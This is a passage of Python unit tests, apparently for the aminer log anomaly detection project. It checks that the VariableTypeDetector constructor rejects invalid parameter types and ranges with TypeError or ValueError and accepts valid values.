self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, silence_output_without_confidence=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, silence_output_except_indicator=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=True) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref={"id": "Default"}) 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
num_update_var_type_hist_ref=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, num_stat_stop_update=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, num_updates_until_var_reduction=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=["Default"]) 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=[]) self.assertRaises(TypeError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
used_multinomial_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="MT") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="Approx") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="Chi") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=b"True") self.assertRaises(TypeError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=True) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=123.22) 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="MeanSD") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="EmpiricQuantiles") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="MinMax") self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=()) self.assertRaises(TypeError, 
VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=1) self.assertRaises(ValueError, VariableTypeDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor="123") 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=1.1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=[]) 
self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=0.05) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, 
VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.22) self.assertRaises(TypeError, 
VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, 
